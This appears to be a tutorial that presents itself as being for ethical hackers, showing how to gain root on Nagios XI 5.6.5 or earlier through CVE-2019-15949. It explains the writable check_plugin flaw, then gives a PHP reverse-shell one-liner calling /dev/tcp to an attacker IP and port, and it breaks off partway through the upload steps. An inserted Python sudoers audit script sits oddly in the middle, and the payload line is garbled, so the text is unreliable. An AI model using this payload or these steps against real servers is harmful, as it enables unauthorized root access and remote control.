How To Crack Nagios XI: A Guide for Ethical Hackers
Nagios XI is a powerful network monitoring product that alerts users to issues or incidents in their IT infrastructure. However, like any software, it may have vulnerabilities that malicious actors can exploit. In this article, we will show you how to crack Nagios XI using a known root remote code execution (RCE) exploit and gain access to the server as root.
Disclaimer: This article is for educational purposes only and should not be used for illegal or unethical hacking. We are not responsible for any damages or consequences that may result from using this information.
A target server running Nagios XI <= 5.6.5. You can check the version by visiting the web interface and looking at the footer.
A Linux machine with PHP installed. You can use any Linux distribution, but we will use Kali Linux for this demonstration.
A reverse shell payload. You can use any reverse shell script or binary, but we will use a simple PHP one-liner for this demonstration.
A listener on your machine. You can use any tool that can listen for incoming connections, but we will use Netcat for this demonstration.
Step 1: Find the Vulnerability
The vulnerability we are going to exploit is CVE-2019-15949, which allows an attacker to leverage an RCE to escalate privileges to root. The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage plugins.
The vulnerability exists in the getprofile.sh script, which is invoked by downloading a system profile (profile.php?cmd=download) and is executed as root via a passwordless sudo entry. That script in turn executes the 'check_plugin' executable, which is owned by the nagios user. A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server, can therefore modify 'check_plugin' and insert commands that run as root.
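The weakness described above is a root-run sudo command (getprofile.sh) that executes a file (check_plugin) an unprivileged account can modify. The following audit script is an added example for administrators, not code from the original article or from Nagios: it lists the commands a sudoers file lets a user run as root without a password, then checks each such command and every helper it is known to execute for non-root ownership, group/world write permission, or a symlink. The sudoers text and all /opt/example paths are constructed placeholders; the getprofile.sh to check_plugin dependency is the one the article describes.

```python
import os
import re
import stat
# "user host=(runas) TAG: cmd, cmd"; runas and tags are optional.
SUDOERS_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
                        r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
# Constructed sample sudoers text; the /opt/example paths are placeholders, not Nagios XI paths.
CONSTRUCTED_SUDOERS = """\
root     ALL=(ALL:ALL) ALL
nagios   ALL=(ALL) NOPASSWD: /opt/example/scripts/getprofile.sh, /opt/example/scripts/other.sh
www-data ALL=(nagios) NOPASSWD: /opt/example/bin/restart.sh  # runs as nagios, not as root
"""

def nopasswd_root_commands(sudoers_text):
    """(user, command) pairs that the file lets run as root without a password."""
    found = []
    for raw in sudoers_text.splitlines():
        m = SUDOERS_RE.match(raw.split("#", 1)[0].strip())
        if not m or "NOPASSWD:" not in m.group("tags"):
            continue
        if (m.group("runas") or "root").split(":")[0].strip() not in ("root", "ALL"):
            continue  # runs as some other account; not a path to root
        for cmd in filter(str.strip, m.group("cmds").split(",")):
            found.append((m.group("user"), cmd.split()[0]))
    return found

def classify_mode(uid, mode, trusted_uid=0):
    """Ways a file that root executes could be replaced by someone who is not root."""
    issues = []
    if stat.S_ISLNK(mode):
        issues.append("symlink (target may be attacker-controlled)")
    if uid != trusted_uid:
        issues.append(f"owned by uid {uid}, not {trusted_uid}")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("group/world writable")
    return issues

def audit(sudoers_text, helpers_by_command):
    """Check each passwordless root command and every helper it is known to execute."""
    report = {}
    for user, cmd in nopasswd_root_commands(sudoers_text):
        for path in [cmd] + helpers_by_command.get(cmd, []):
            try:
                st = os.lstat(path)  # lstat: a symlink must be reported as one
                issues = classify_mode(st.st_uid, st.st_mode)
            except FileNotFoundError:
                issues = ["missing"]
            if issues:
                report[(user, cmd, path)] = issues
    return report
```

Point `audit()` at the real /etc/sudoers and /etc/sudoers.d/* contents (read as root) together with the helpers each listed script actually executes; any non-empty finding is the same class of path as the one this article exploits.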
Step 2: Prepare the Payload
The payload we are going to use is a simple PHP one-liner that executes a reverse shell to our machine:
& /dev/tcp/10.10.10.10/1234 0>&1'\\\"); ?>
Replace 10.10.10.10 with your IP address and 1234 with your port number.
Save this payload as check_plugin.php on your machine.
Step 3: Upload the Payload
There are two ways to upload the payload to the target server: via the web interface or via SSH.
Via web interface:
Log in to the Nagios XI web interface with a valid username and password.